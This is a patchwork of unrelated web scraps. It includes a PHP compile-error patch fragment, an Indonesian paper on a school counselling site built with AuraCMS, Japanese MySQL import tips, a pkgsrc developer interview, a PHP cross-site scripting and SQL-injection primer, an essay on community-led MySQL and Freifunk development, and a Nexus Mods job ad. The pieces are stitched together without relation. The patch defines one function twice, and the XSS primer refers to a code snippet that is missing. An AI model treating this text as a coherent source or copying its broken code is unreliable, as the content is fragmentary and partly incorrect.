+#elif defined(__GNUC__) && __GNUC__ < 3
+static __inline __int64_t php_date_llabs( __int64_t i ) { return i >= 0 ? i : -i; }
+static __inline long long php_date_llabs( long long i ) { return i >= 0 ? i : -i; }

 /* {{{ arginfo */

Expected result:
successful compile

Actual result:
compile aborts with error

          25.09.2017: Regionaltreffen Halle/Leipzig        
Teknologi Informasi dan Komunikasi (Information and Communication Technology) saat ini sudah menjadi bagian yang tidak terlepaskan dapat proses pendidikan. Keterbatasan ruang dan waktu tidak menjadi halangan untuk menjalakan proses pendidikan. Manfaat teknologi informasi dan komunikasi dalam dunia pendidikan telah memberikan dampak positif khususnya untuk pemerataan pendidikan. Setiap sekolah dapat memiliki referensi-referensi buku yang berstandar dan bermutu hanya dengan menekan tombol. Bimbingan dan Konseling sebagai bagian dari sekolah yang berperan penting dalam menangani permasalahan setiap siswa, yang terkait dengan kehidupan sosial, pribadi, karir dan belajar, secara konsep memiliki program Layanan Informasi. Layanan informasi ini akan menyajikan berbagai informasi tentang sekolah yang dapat membantu siswa dalam menyelesaikan studinya. Layanan informasi sekolah berbasis web yang dikelola oleh Guru Bimbingan Konseling disekolah akan sangat bermanfaat bagi siswa untuk memperoleh informasi yang dapat menunjang keberhasilan studinya. Layanan informasi ini memungkinkan adanya interaktifitas antara siswa dengan Guru Bimbingan Konseling untuk konsultasi, penyampaian ide, regristrasi online untuk alumni sekolah dan lain-lain. Layanan informasi sekolah yang baik bisa menjadi sebuah media pencitraan terhadap kualitas sekolah dan personal yang berada didalamnya kepada masyarakat.
Kata kunci: Sekolah, Web, Layanan Informasi, Bimbingan Konseling.

Pada penerapan Kurikulum Tingkat Satuan Pendidikan (KTSP), Guru Bimbingan Konseling / Konselor di sekolah memberikan pelayanan berkaitan Pengembangan Diri, sesuai minat dan bakat serta mempertimbangkan tahapan tugas perkembangan peserta didik dalam lingkup usia Sekolah Menengah Atas (SMA), mengingat adanya keberagaman individu (individual deferencies). Guru Bimbingan Konseling / Konselor bersama Wali Kelas dan Guru Mata Pelajaran menjadi pendamping dalam setiap proses pembelajaran. Hal itu dimaksudkan untuk membantu peserta didik agar mampu menuntaskan seluruh mata pelajaran seoptimal mungkin sesuai dengan potensi kemampuan akademik, bakat dan minatnya, sehingga hambatan dan kemungkinan kegagalan sudah dapat diprediksi, diketahui dan dibimbing sejak dini. Selain itu, untuk membimbing peserta didik dalam menentukan pilihannya secara mandiri dan mampu mengambil keputusan. Bimbingan dan Konseling dilaksanakan melalui berbagai layanan, dengan mempertimbangkan kehidupan pribadi, kehidupan sosial dan perkembangan kehidupan pembelajaran serta perencanaan karir. Bentuk pelayanan bagi peserta didik dapat dikembangkan dengan menggunakan berbagai cara dan variasi sesuai kebutuhan sekolah, kekhasan atau karakteristik potensi daerah. Pada era teknologi yang semakin maju muncul pemikiran untuk memanfaatkan teknologi sebagai media yang dapat membantu pelaksanaan program Bimbingan dan Konseling disekolah. Secara konsep Bimbingan dan Konseling memiliki empat komponen layanan salah satunya adalah Layanan Perencanaan Individual. Tujuan layanan perencanaan individual ini dirumuskan sebagai upaya memfasilitasi siswa untuk membuat, memonitor, dan mengelola rencana pendidikan, karir, dan pengembangan sosial-pribadi oleh dirinya sendiri. Salah satu cara untuk mencapai tujuan tersebut maka diperlukan sebuah media layanan informasi yang fleksibel dan dapat diakses oleh siswa kapan saja dan dimana saja. Salah satu solusi untuk mengatasi masalah ini adalah dengan membuat sebuah website Layanan Informasi Sekolah. Dengan memperhatikan keterbatasan sumber daya yang dimiliki maka website Layanan Informasi Sekolah yang dikelola oleh guru pembimbing setidaknya memiliki empat syarat :
1. Easy to use
2. Easy to manage
3. Simple
4. Dynamic
Hal tersebut diatas dapat direalisasikan dengan menggunakan (CMS) Content Management System. CMS secara umum dapat diartikan sebagai sebuah sistem yang memberikan kemudahan pada para pengunanya dalam mengelola dan melakukan perubahan isi sebuah website dinamis tanpa harus dibekali pengetahuan tentang hal-hal yang bersifat teknis. Salah satu CMS yang dapat digunakan adalah AuraCMS dengan lisensi GPL (General Public License), open source/bebas dimodifikasi, asli buatan komunitas Indonesia, mudah dan murah serta berbahasa Indonesia. AuraCMS merupakan sekumpulan scrip PHP yang membentuk sebuah web portal dinamis dengan database MySQL.
AuraCMS memiliki kelebihan tersendiri dibandingkan dengan CMS yang lain dan lebih mudah dipelajari oleh awam. Layanan Informasi Sekolah yang dibangun dengan menggunakan AuraCMS akan bersifat dinamis, mudah digunakan, simple dan mudah dikelola serta memiliki ukuran file yang kecil. AuraCMS dapat online dalam waktu 1 jam pada server gratis yang banyak ditawarkan di internet. Dengan demikian AuraCMS direkomendasikan sebagai salah satu Content Management System yang dapat digunakan sebagai Media Layanan Informasi pada Bimbingan dan Konseling disekolah.

Metode yang digunakan dalam penelitian ini adalah metode eksperimen dengan kegiatan berupa modifikasi, try and error. Content Management System dipelajari kemudian dimodifikasi dan di uji cobakan pada local server dan server online di internet secara berulang kali. Semua kegiatan uji coba bersifat try and error dengan pengertian bila hasilnya percobaan gagal/rusak ditinggalkan dan membuat yang baru lagi kemudian diujicobakan kembali.

A. Layanan Informasi Sekolah
Bimbingan dan Konseling sebagai bagian dari sekolah yang membantu siswa mengatasi segala permasalahan yang dihadapi dalam proses studi untuk mencapai perkembangan yang optimal. Segala upaya dapat dilakukan untuk menjalin hubungan emosi antara guru pembimbing dengan siswa. Upaya ini dilakukan dengan merealisasikan program layanan yang sudah terkonsep sebagai empat komponen layanan pada bimbingan dan konseling. Salah satunya dari empat komponen layanan tersebut adalah Layanan Perencanaan Individual. Tujuan layanan perencanaan individual ini dapat juga dirumuskan sebagai upaya memfasilitasi siswa untuk membuat, memonitor, dan mengelola rencana pendidikan, karir, dan pengembangan sosial-pribadi oleh dirinya sendiri. Isi atau materi perencanaan individual adalah hal-hal yang menjadi kebutuhan siswa untuk memahami secara khusus tentang perkembangan dirinya sendiri. Dengan demikian meskipun perencanaan individual ditujukan untuk memandu seluruh siswa, layanan yang diberikan lebih bersifat individual karena didasarkan atas perencanaan, tujuan dan keputusan yang ditentukan oleh masing-masing siswa. Melalui layanan perencanaan individual, diharapkan siswa dapat :
1. Mempersiapkan diri untuk mengikuti pendidikan lanjutan, merencanakan karir, dan mengembangkan kemampuan sosial-pribadi, yang didasarkan atas pengetahuan akan dirinya, informasi tentang sekolah, dunia kerja, dan masyarakatnya.
2. Menganalisis kekuatan dan kelemahan dirinya dalam rangka pencapaian tujuannya.
3. Mengukur tingkat pencapaian tujuan dirinya.
4. Mengambil keputusan yang merefleksikan perencanaan dirinya.

Sebagain dari tujuan layanan tersebut diatas cenderung bersifat informatif, maka perlu dibangun sebuah Layanan Informasi berbasis web yang dinamis dengan content yang menarik dan mudah dimanagement, yakni dengan menggunakan Content Management System. Content Management System yang dimaksud adalah AuraCMS. Layanan Informasi Sekolah yang dibangun dengan menggunakan AuraCMS dapat dilakukan dengan mudah, bahkan dapat dilakukan oleh user/pengguna yang belum memahami bahasa pemrograman seperti PHP atau java yang biasa digunakan untuk membuat sebuah website. AuraCMS yang digunakan untuk membangun Layanan Informasi Sekolah merupakan CMS yang dibuat oleh orang Indonesia dan berbahasa Indonesia yang bersifat open source dengan lisensi General Public License. AuraCMS memiliki ukuran file yang kecil dan mudah untuk dikonfigurasikan msecara manual pada local sever atau server-server gratis yang ada di internet sehingga lebih bernilai ekonomis. Dengan segala kemudahannya maka Layanan Informasi Sekolah yang dibangun dapat dikelola oleh guru pembimbing tanpa harus membayar tenaga ahli.

B. Keuntungan dari Fasilitas AuraCMS
Beberapa keuntungan dari modul atau fasilitas AuraCMS yang dapat dimanfaatkan sebagai media Layanan Informasi pada Bimbingan dan Konseling disekolah adalah :
1. Fasilitas Send Artikel yang dapat digunakan sebagai media surat elektronik yang bersifat rahasia dari siswa kepada guru pembimbing.
2. Fasilitas Download yang siswa dapat mendownload informasi atau file tugas dari guru pembimbing.
3. Fasilitas pesan singkat sebagai media penyampaian pesan singkat yang dapat dibaca oleh setiap orang.
4. Fasilitas Polling sederhana setiap pengunjung dapat memberikan jawaban dari pertanyaan/pernyataan yang tertulis pada modul polling.
5. Fasilitas Registrasi Online untuk alumni sekolah.

C. Proses Perancangan Local Server
Siapkan software pendukung point 1, 2, dan 3
1. Software Server XAMPP dapat didownload di (http://www.apachefriends.org).
2. Web Browser dapat menggunakan Internet Explorer atau Mozila Firefox.
3. File AuraCMS dapat didownload di (http://www.auracms.org)
4. Instal server pada PC yang akan digunakan sebagai computer server.
5. Setelah proses install selesai aktifkan apache dan MySQL
6. Kemudian buat folder dengan nama Sekolah atau nama lain pada alamat C://xampp/htdocs dan ekstrak file AuraCMS kedalam folder tersebut.
7. Buka Browser tulis alamat sebagai berikut (http://localhost/phpmyadmin) maka akan muncul tampilan phpmyadmin.
8. Buat database dengan nama (sekolah) klik create/ciptakan
9. Setelah itu upload file SQL yang berada pada C://xampp/htdocs/sekolah
10. Setelah database tercipta dan file SQL sukses diupload konfigurasikan nama database pada file C://xampp/htdocs/sekolah/includes/config.php disesuaikan dengan nama database yang telah dibuat pada point 8.
11. Buka browser dan ketikan alamat C://localhost/sekolah maka tampilan web portal AuraCMS akan muncul.
12. Website pada local server sudah jadi Selamat Berjuang

D. Proses Perancangan Server Online

1. Buat subdomain gratis di (http://www.freewebhosting.com) misal http://sekolah.coolpage.biz.
2. Biasanya nama data base dan username sama dan otomatis telah dibuatkan oleh penyedia server, nama database dan username berupa beberapa digit angka misal 12345.
3. Konfigurasikan nama database yang telah anda terima pada file config.php yang ada pada file AuraCMS.
4. File AuraCMS dibuat menjadi file ZIP kemudia upload file melalui http://www.net3ftp.com.
5. Setelah proses upload selesai buka browser baru dan ketikan alamat subdomain yang telah anda buat tadi.
6. Layanan Informasi Sekolah online telah terbit proses ini tidak memakan waktu lama kurang lebih satu jam dan gratis.

E. Tampilan Layanan Informasi Bimbingan Konseling Sekolah pada Local Server
Gambar 1. Tampilan pada Halaman Depan

Gambar 1. Tampilan pada Halaman Depan

Gambar 2. Tampilan pada Halaman Registrasi Alumni

Gambar 3. Tampilan pada Halaman Sistem Informasi Geografis Lokasi Sekolah

Gambar 4. Tampilan pada Halaman Galery Foto

Gambar 5. Tampilan pada Halaman Buku Tamu sebagai fasilitas konsultasi

Gambar 6. Tampilan pada Halaman Artikel sebagai fasilitas News

Gambar 7. Tampilan pada Halaman Download sebagai fasilitas Penugasan

Layanan informasi sekolah ini dapat digunakan sebagai media Layanan Informasi pada kegiatan Bimbingan dan Konseling disekolah untuk meningkatkan interaktivitas antara guru pembimbing dengan siswa. Layanan informasi ini juga dapat digunakan sebagai support information yang dapat membantu siswa dalam pengembangan potensi dirinya baik secara pribadi, social, belajar dan karir.

Puji syukur kehadirat Allah SWT, atas nikmat kesehatan dan ridho-Nya penulis dapat menyelesaikan makalah ini. Makalah dengan judul “Perancangan Layanan Informasi Berbasis Web Pada Program Kegiatan Bimbingan Dan Konseling Disekolah“ sebagai salah satu wujud bakti penulis untuk kemajuan Profesi Konselor dan Bimbingan Konseling di Universitas Lampung khususnya dan di Indonesia pada umumnya. Dalam kesempatan ini penulis mengucapkan terima kasih kepada:
a) Bapak Prof. Dr. Sudjarwo, M.S., selaku Dekan Fakultas Keguruan dan Ilmu Pendidikan Universitas Lampung;
b) Bapak Drs. Danial Achmad, M.Pd., selaku Ketua Jurusan Ilmu Pendidikan, Fakultas Keguruan dan Ilmu Pendidikan, Universitas Lampung;
c) Bapak Drs. Muswardi Rosra, M.Pd., selaku Ketua Program Studi Bimbingan Konseling, Jurusan Ilmu Pendidikan, Fakultas Keguruan dan Ilmu Pendidikan, Universitas Lampung;
d) Bapak Drs. Giyono, M.Pd., selaku Pembimbing atas kesediaannya untuk memberikan bimbingan, saran, dan kritik yang membangun dalam proses penyelesaian makalah ini;
e) Rekan-rekan Mahasiswa Bimbingan Konseling Universitas Lampung atas motivasi yang telah diberikan.
f) Rekan-rekan AssalamNET atas bantuan dan partisipasi yang telah diberikan.



Sakuraを利用しているわけではないので、初期設定でどの文字コードの設定なのか分かりませんが、SQLファイルを、UTF-8、EUC、Shift JISなどに変換後、再度インポートしてみてはどうでしょうか?






SET NAMES sjis ;





  • SQLをサーバーにscpやftpなりでアップロードする
    • 念のためにクライアントソフトに文字エンコード変換とか自動テキスト変換があればそれを無効にしましょう
  • コマンドでSQLをMySQLに入れる
mysql -u 「さくらからもらっているMySQLアカウント名」 -p 「使用するデータベースの名前」 < 「あなたがアップロードしたSQLファイルのファイル名」


mysql -u 「さくらからもらっているMySQLアカウント名」 -p create 「使用するデータベースの名前」

ちなみにMySQL 4.0は文字エンコードの自動変換の機能は持っていないので,テーブル作成やレコードの追加をするだけでいうとあまり意識する必要はないと思います

          ì›¹,안드로이드앱 저렴한 가격에 개발해드립니다.        
언어 : html, css, javascript, jquery, php, mysql, java, android 등- 웹사이트- 모바일웹- 하...
          Fine Tuning MySQL Server To Achieve Faster Website Loading        

MySQLAll popular blogging platforms and Content Management Systems (CMS) like Drupal, Wordpress and Joomla make extensive use of database back-end and having a fine-tuned database server is crucial to achieve optimal performance on these. As the saying goes "one size does not fit all" the default my.cnf which comes with MySQL server needs fixing as per your scripts requirements and hardware configuration, thankfully we do have free tools to get this done effectively and easily.

Today, I will be showing two scripts and a simple tip which will help us optimize our databases to achieve maximum performance - before proceeding do keep in mind that this is quite advanced as it requires editing database configuration files and working via shell access to linux root on your server.

          Analyze, check, auto-repair and optimize Mysql Database        
$ mysqlcheck -a --auto-repair -c -o -uroot -p [DB]

A useful way to do a full check and auto repair damaged databases


Diff your entire server config at ScriptRock.com

          pkgsrc 50th release interviews - Jonathan Perkin        

The pkgsrc team has prepared the 50th release of their package management system, with the 2016Q1 version. It's infrequent event, as the 100th release will be held after 50 quarters.

The NetBSD team has prepared series of interviews with the authors. The next one is with Jonathan Perkin, a developer in the Joyent team.

Hi Jonathan, please introduce yourself.

Hello! Thirty-something, married with 4 kids. Obviously this means life is usually pretty busy! I work as a Software Engineer for Joyent, where we provide SmartOS zones (also known as "containers" these days) running pkgsrc. This means I am in the privileged position of getting paid to work full-time on what for many years has been my hobby.

First of all, congratulations on the 50th release of pkgsrc! How do you feel about this anniversary?

I've been involved in pkgsrc since 2001, which was a few years before we started the quarterly releases. Back then and during the early 2000s there was a significant amount of work going into the pkgsrc infrastructure to give it all the amazing features that we have today, but that often meant the development branch had some rough edges while those features were still being integrated across the tree.

The quarterly releases gave users confidence in building from a stable release without unexpected breakages, and also helped developers to schedule any large changes at the appropriate time.

At Joyent we make heavy use of the quarterly releases, producing new SmartOS images for each branch, so for example our 16.1.x images are based on pkgsrc-2016Q1, and so on.

Reaching the 50th release makes me feel old! It also makes me feel proud that we've come a long way, yet still have people who want to be involved and continue to develop both the infrastructure and packages.

I'd also like to highlight the fantastic work of the pkgsrc releng team, who work to ensure the releases are kept up-to-date until the next one is released. They do a great job and we benefit a lot from their work.

What are the main benefits of the pkgsrc system?

For me the big one is portability. This is what sets it apart from all other package managers (and, increasingly, software in general), not just because it runs on so many platforms but because it is such a core part of the infrastructure and has been constantly developed and refined over the years. We are now up to 23 distinct platforms, not counting different distributions, and adding support for new ones is relatively easy thanks to the huge amount of work which has gone into the infrastructure.

The other main benefit for me is the buildlink infrastructure and various quality checks we have. As someone who distributes binary packages to end users, it is imperative that those packages work as expected on the target environment and don't have any embarrassing bugs. The buildlink system ensures (amongst other things) that dependencies are correct and avoids many issues around build host pollution. We then have a number of QA scripts which analyse the generated package and ensure that the contents are accurate, RPATHs are correct, etc. It's not perfect and there are more tests we could write, but these catch a lot of mistakes that would otherwise go undetected until a user submits a bug report.

Others for me are unprivileged support, signed packages, multi-version support, pbulk, and probably a lot of other things I've forgotten and take for granted!

Where and how do you use pkgsrc?

As mentioned above I work on pkgsrc for SmartOS. We are probably one of the biggest users of pkgsrc in the world, shipping over a million package downloads per year and rising to our users, not including those distributed as part of our images or delivered from mirrors. This is where I spend the majority of my time working on pkgsrc, and it is all performed remotely on a number of zones running in the Joyent Public Cloud. The packages we build are designed to run not just on SmartOS but across all illumos distributions, and so I also have an OmniOS virtual machine locally where I test new releases before announcing them.

As an OS X user, I also use pkgsrc on my MacBook. This is generally where I perform any final tests before committing changes to pkgsrc so that I'm reasonably confident they are correct, but I also install a bunch of different packages from pkgsrc (mutt, ffmpeg, nodejs, jekyll, pstree etc) for my day-to-day work. I also have a number of Mac build servers in my loft and at the Joyent offices in San Francisco where I produce the binary OS X packages we offer which are starting to become popular among users looking for an alternative to Homebrew or MacPorts.

Finally, I have a few Linux machines also running in the Joyent Public Cloud which I have configured for continuous bulk builds of pkgsrc trunk. These help me to test any infrastructure changes I'm working on to ensure that they are portable and correct.

On all of these machines I have written infrastructure to perform builds inside chroots, ensuring a consistent environment and allowing me to work on multiple things simultaneously. They all have various tools installed (git, pkgvi, pkglint, etc) to aid my personal development workflow. We then make heavy use of GitHub and Jenkins to manage automatic builds when pushing to various branches.

What are the pkgsrc projects you are currently working on?

One of my priorities over the past year has been on performance. We build a lot of packages (over 40,000 per branch, and we support up to 4 branches simultaneously), and when the latest OpenSSL vulnerability hits it's critical to get a fix out to users as quickly as possible. We're now at the stage where, with a couple of patches, we can complete a full bulk build in under 3 hours. There is still a lot of room for improvement though, so recently I've been looking at slibtool (a libtool replacement written in C) and supporting dash (a minimal POSIX shell which is faster than bash).

There are also a few features we've developed at Joyent that I continue to maintain, such as our multiarch work (which combines 32-bit and 64-bit builds into a single package), additional multi-version support for MySQL and Percona, SMF support, and a bunch of other patches which aren't yet ready to be integrated.

I'm also very keen on getting new users into pkgsrc and turning them into developers, so a lot of my time has been spent on making pkgsrc more accessible, whether that's via our pkgbuild image (which gives users a ready-made pkgsrc development environment) or the developer guides I've written, or maintaining our https://pkgsrc.joyent.com/ website. There's lots more to do in this area though to ensure users of all abilities can contribute meaningfully.

Most of my day-to-day work though is general bug fixing and updating packages, performing the quarterly release builds, and maintaining our build infrastructure.

If you analyze the current state of pkgsrc, which improvements and changes do you wish for the future?

More users and developers! I am one of only a small handful of people who are paid to work on pkgsrc, the vast majority of the work is done by our amazing volunteer community. By its very nature pkgsrc requires constant effort updating existing packages and adding new ones. This is something that will never change and if anything the demand is accelerating, so we need to ensure that we continue to train up and add new developers if we are to keep up.

We need more documentation, more HOWTO guides, simpler infrastructure, easier patch submission, faster and less onerous on-boarding of developers, more bulk builds, more development machines. Plenty to be getting on with!

Some technical changes I'd like to see are better upgrade support, launchd support, integration of a working alternative pkg backend e.g. IPS, bmake IPC (so we don't need to recompute the same variables over and over), and many more!

Do you have any practical tips to share with the pkgsrc users?

Separate your build and install environments, so e.g. build in chroots or in a VM then deploy the built packages to your target. Trying to update a live install is the source of many problems, and there are few things more frustrating than having your development environment be messed up by an upgrade which fails part-way through.

For brand new users, document your experience and tell us what works and what sucks. Many of us have been using pkgsrc for many many years, and have lost your unique ability to identify problems, inconsistencies, and bad documentation.

If you run into problems, connect to Freenode IRC #pkgsrc, and we'll try to help you out. Hang out there even if you aren't having problems!

Finally, if you like pkgsrc, tell your friends, write blog posts, post to Hacker News etc. It's amazing to me how unknown pkgsrc is despite being around for so long, and how many people love it when they discover it.

More users leads to more developers, which leads to improved pkgsrc, which leads to more users, which...

What's the best way to start contributing to pkgsrc and what needs to be done?

Pick something that interests you and just start working on it. The great thing about pkgsrc is that there are open tasks for any ability, from documentation fixes all the way through adding packages to rewriting large parts of the infrastructure.

When you have something to contribute, don't worry about whether it's perfect or how you are to deliver it. Just make it available and let us know via PR, pull request, or just mail, and we can take it from there.

Do you plan to participate in the upcoming pkgsrcCon 2016 in Kraków (1-3 July)?

I am hoping to. If so I usually give a talk on what we've been working on at Joyent over the past year, and will probably do the same.



五島たべんば  ec-cube.jpg




GoreyDesign http://www.goreydesign.com/
久野印刷株式会社 http://www.media-line.or.jp/hisano/

          Your Xtrabackup Cheat Sheet        
Ivan Groenewold, MySQL Database Consultant at Pythian, provides examples of useful operations using xtrabackup.
          MySQL encrypted streaming backups directly into AWS S3        
Overview Cloud storage is becoming more and more popular for offsite storage and DR solutions for many businesses. This post will help with those people that want to perform this process for MySQL backups directly into Amazon S3 Storage. These...
          Web Security, Cross Site Scripting and PHP        
As World's most of the websites rely heavily on complex web application in which sensitive and nonsensitive data communication takes place. Web security does not only related to money transaction but also for personal information which may be very sensitive.We always think that this web page have same origin. Most of the user worry about security but no-body is sure that there information is secure even they are using brand web applications like facebook or gmail.
Before 1 year i heard that facebook was attacked by malicious spam, may be you was the victim but how it was possible. Actually any security measure not far away from hackers, lets think about previous incident of facebook attack. when i was searching how a person(usually hacker) can attack on other website i come to know about cross site scripting.
What is cross site scripting?
cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim. Cross-site scripting attacks are therefore a special case of code injection.
it is also abbreviated as XSS. There is no single, standardized classification of cross-site scripting
In it attacker executes a fragment of JavaScript, ActiveX, Java, VBScript, Flash, or even HTML scripts in the security context of the targeted domai.
How to prevent XSS?
There are several methods and prevention are available you can go through Wikipedia.org where you can find thread reducing techniques and related links, but i am giving some extra information for php developer which was my actual area of interest for this research.
for initial level php developer can prepare his web page to stay away from XSS using following code snipt


Along with code injection, SQL injection is also possible, attacker can alter or create a SQL query to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. Using commonly used table name and column name make this simple for attacker for example column names 'id', 'username', and 'password'.
some precautions suggested by php.net are
  • Never connect to the database as a superuser or as the database owner. Use always customized users with very limited privileges. 
  • Use prepared statements with bound variables. They are provided by PDO, by MySQLi and by other libraries.
  • Check if the given input has the expected data type. PHP has a wide range of input validating functions, from the simplest ones found in Variable Functions and in Character Type Functions (e.g. is_numeric(), ctype_digit() respectively) and onwards to the Perl compatible Regular Expressions support.
  • If the application waits for numerical input, consider verifying data with ctype_digit(), or silently change its type using settype(), or use its numeric representation by sprintf().
  • If the database layer doesn't support binding variables then quote each non numeric user supplied value that is passed to the database with the database-specific string escape function (e.g. mysql_real_escape_string(), sqlite_escape_string(), etc.). Generic functions like addslashes() are useful only in a very specific environment (e.g. MySQL in a single-byte character set with disabled NO_BACKSLASH_ESCAPES) so it is better to avoid them.
  • Do not print out any database specific information, especially about the schema, by fair means or foul. See also Error Reporting and Error Handling and Logging Functions.
  • You may use stored procedures and previously defined cursors to abstract data access so that users do not directly access tables or views, but this solution has another impacts. 
 Thank you very much for reading this article, see you later, bye bye......... 

          Community First!        

The current release of MySQL shows the problems free and open source software projects face that put business first and community second. Michael “Monty” Widenius critizes in his Blog the current developement model of MySQL and recommends not to use the current release 5.1 of the database system.

The reason I am asking you to be very cautious about MySQL 5.1 is that there are still many known and unknown fatal bugs in the new features that are still not addressed.

Monty points out problems stemming from having a company taking the lead in the development of a free software system - cause they need something to sell fast. In this article I am supporting the view of Monty and discuss his views in regards to Freifunk and LXDE. I believe communities must take the lead in order to make and keep a project on the bleeding edge, however, we should work together with companies (like FON.com for Freifunk or ASUS for LXDE) and exchange resources. Both can profit. In the end open and free community projects are all about cooperation.

In his blog entry Monty gives some reasons why the MySQL development department again got a quality problem with the release. Problems are ranging from the fact that MySQL 5.1 was declared a release candidate to early (because of commercial reasons), to focussing too much on new features rather than on quality (because of commercial reasons), to involving developers that are not experienced in developing database systems (Mario: Maybe because they do not come from the community?), to not keeping the development open for testing and participation of the community and more.

As I said in my talk at the MySQL users conference, I think it’s time to seriously review how the MySQL server is being developed and change the development model to be more like Drizzle and PostgreSQL where the community has a driving role in what gets done! (http://monty-says.blogspot.com/2008/11/oops-we-did-it-again-mysql-51-rel...)

What can we learn for the free software and other open source projects here? The consequences are clear. Projects that want to stay on the bleeding edge of technology with quality code and widespread support must put the community first.

In the projects I participate - e.g. freifunk, LXDE, FOSS Bridge - I always work hard to bring the community together, make the community grow and keep and foster it. And this is not always easy. There are different expectations of people involved, different goals and outside circumstances change and have positive and negative effects.

For example, even though the Freifunk community was in the spotlight many times in the last two years, it seemed somehow stagnating. We had put a lot of resources to rebuild the website and foster more exchange, but with the broader availability of broadband in some districts in Berlin for example the motivation of people to participate to get constant Internet access became less. Additionally new business models seemed to draw people away from freifunk to something that seemed easier to use and offer many things similar to Freifunk. However Freifunk is more than mere exchange of free Internet access. The idea of Freifunk is to build a local network - the public space in cyberspace, but we did not have the tools easy enough giving everyone the chance to build the local network with the limited resources, especially time!, that people have.. but we are getting there with simpler software and easier to use devices.

FON.com received different reactions in the core groups of the global Freifunk community when it started, ranging from refusing any connection with FON to trying to ignoring it. Some welcomed FON and their involvement. FON pays some of the core OpenWRT developers which is the base of the Freifunk Firmware and it offers new hardware, that can also be used by the Freifunk community. Personally I do not mind working together with FON. As I see it, we have to be pragmatic and everyone has to make a living and the Freifunk community could profit from the involvement of FON and other companies. I would like the decision if people from the community work for and with FON left to the person him/herself. At a recent meeting in Berlin, I have discussed this a bit with Martin Varsavsky. Martin actually asked me how FON could work together more with the Freifunk community.

We should be clear here though. FON and Freifunk are two very different things. FON is a company that labels its participants (actually its customers) community. Freifunk is a community with many different people - students, engineers, scientists, free and open source activists, people who want Internet, people who want a truly free network, people using it for their business, people working for development cooperation and so on. People have different motivations to participate in Freifunk - interest for technology and development, Internet access, interest in new ideas and projects, inspired by idea of freedom, a way to make a living. These people would not participate if Freifunk was a commercial operation. I remember the saying of some ¨Money destroys the community¨. It is formulated in this regard, I believe.

Still, we should not be absolute here - meaning - we should acquire resources and money for the community -> for conferences, events, hardware for developers, funding for projects etc.. Based on my experience of the last years, communities need resources. We should study successful models of communities that have achieved to channel resources to the people really working on it. Associations, Foundations and similar organisations are very helpful here as they keep things transparent and offer newcomers entry points. Also companies that would like to support projects have it easier to talk to someone from the community if there is a working organisation set up.

During recent months I have seen more activity in the Freifunk community again. With the new OpenWRT Firmware Freifunk will have many features which we want for years. I am always talking about the fantastic things we can do in local networks - new usage cases and sharing of content in your local environment, community radio in schools, universities or simply your backyard. Local networks are different to the Internet as cinema to TV. Felix Fietkau and John have presented a development version of OpenWRT to a group in Berlin recently. The new OpenWRT will offer plugins that will let us store content directly on the nodes. With router devices offering USB connections now everyone can have their small webserver at home. We can have a local Web 2.0. With devices connected to sensors like thermometers we can have live feeds from all over the city, the country and worldwide. I do not want this local Web 2.0 called after a company, a device or anything else. We call this FREIFUNK. A global local = glocal network open to everyone - to the public and to companies.

Companies are always welcome to join development and focus on their business models. However, Open Source, Open Infrastructure and Free Software Projects like Freifunk and LXDE or Open Content projects like Wikipedia have a roadmap that is following long term goals instead of short term profitability. And people are engaging here not just for monetary reasons, they have much broader motivations and they are inspired by the freedom the communities offer. This is why communities are more powerful. Companies simply cannot compete with this in terms of human resources and motivation. In order to grow and sustain free and open projects and the communities though we need to work together in our different fields and we need companies that engage and support the communities.

          We're Hiring: UI Designer/Front End Developer Position        
We're looking for a UI Designer/front end developer to join our team at our office in Exeter, UK. The ideal candidate will be multi skilled with experience working with HTML/CSS/JS for both websites and desktop applications.

Your primary short term role will be to help design and shape our new desktop application "Vortex" which is replacing the Nexus Mod Manager. This application uses Electron, so the front end is rendered in HTML/CSS/JS.

In the long term, you'll be the major creative driving force behind the UX and UI of both Vortex and the Nexus Mods website, shaping how both the site and application look for millions of users.

[b][size=4]The Role[/size][/b]

You'll be joining our established development teams for both the Nexus Mods website and Vortex.

[b]Nexus websites[/b] - which currently consists of 5 programmers whose primary responsibility is the Nexus Mods website and everything around it. The stack consists of a mixture of technologies - Linux, Apache, NginX, PHP, MySQL, APC, Redis, Ruby, Rails, Bash, Git, Puppet, Vagrant, Javascript, Jquery, CSS, HTML and everything in between. Your role will be to design the UX/UI for current and new features on our website and create imagery for use throughout the site.

[b]Vortex[/b] - which currently consists of 3 programmers who are working on producing an open source desktop application to replace Nexus Mod Manager. The stack for Vortex is currently: Javascript, Typescript, C#, C++, HTML, Node, Electron, React, Redux and Bootstrap. Your role will be to design the UX/UI and layouts for this application and work with the other developers closely on new features.

We work as closely as possible to an agile project management scheme and every team member's input is highly valued - we're looking for people who can constructively discuss and present new ideas in our meetings.

Ultimately, we're looking for people who are keen to learn and flexible in their approach with a strong background in website and/or UI design.

[b][size=4]Your Background[/size][/b]

[*][size=2]You'll need production experience with HTML/CSS/JS and be comfortable with all related technologies such as the related frameworks for each.[/size]
[*][size=2]Experience of using these technologies to deliver a desktop product would be an advantage, but not essential - a portfolio of web only design/UI would be acceptable.[/size]
[*][size=2]Knowledge of gaming and modding would be very beneficial.[/size]

[*][size=2]Working as part of the Vortex team and taking the lead role in the UI and UX.[/size]
[*][size=2]Working with our web team to design new features and functionality for the Nexus Mods website.[/size]
[*][size=2]Occasionally helping out the community team with imagery for site content.[/size]
[*][size=2]Participating in team meetings, keeping track of your workflow using project management tools.[/size]
[*][size=2]Working with everyone at Nexus Mods to shape the future of our platform.[/size]

[/size][size=4][b]Requirements and Skills[/b][/size]

[*][size=2]Javascript & Javascript Frameworks[/size]
[*][size=2]Strong graphic skills (Photoshop, etc.)[/size]
[*][size=2]Strong communication skills both verbally and written (English)[/size]
[*][size=2]Right to work in the UK[/size]
[size=4][b]Bonus Skills[/b][/size]

[*][size=2]Ruby / Rails / PHP[/size]
[*][size=2]Experience with code testing[/size]
[*][size=2]An understanding of games modding and knowledge of Nexus Mods[/size]
[*][size=2]A sense of humour[/size]
[*][size=2]A love of computer games[/size]

[/size][size=4][b]Other Information[/b][/size]

[*][size=2]We will offer a competitive market-rate salary dependent on your level.[/size]
[*][size=2]We will provide high spec hardware for you to work from in the office.[/size]
[*][size=2]For the right candidates, we may be able to assist with relocation expenses and logistics.[/size]
[*][size=2]Fridays are Chocolate Fridays in the office. Get hyped.[/size]
[*][size=2]You'll want to hone your skills in "Golf with Your Friends" before joining us.[/size]
[/size][b][size=4]To Apply[/size][/b]

